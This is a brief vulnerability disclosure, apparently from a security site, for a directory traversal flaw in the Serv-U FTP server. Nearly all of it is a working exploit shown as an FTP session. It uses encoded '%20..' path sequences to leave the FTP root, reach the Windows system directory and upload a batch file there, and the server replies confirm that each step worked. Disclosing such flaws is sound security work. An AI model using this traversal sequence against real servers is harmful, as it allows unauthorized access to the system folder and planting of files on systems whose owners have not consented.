|
Serv-U FTP Directory Traversal Vulnerability
Exploit provided by Zoa_Chien <zoachien@securax.org>: ftp> cd \..%20. 250 Directory changed to /.. ftp> cd %20..%20%20../winnt 250 Directory changed to /c:/TOMB/../WINNT ftp> put autoexec.bat %20..%20%20../winnt/2.bat 200 PORT Command successful. 150 Opening ASCII mode data connection for 2.bat. 226 Transfer complete. ftp> dir \..%20.\..%20.\winnt\ |
|
|
Privacy Statement |
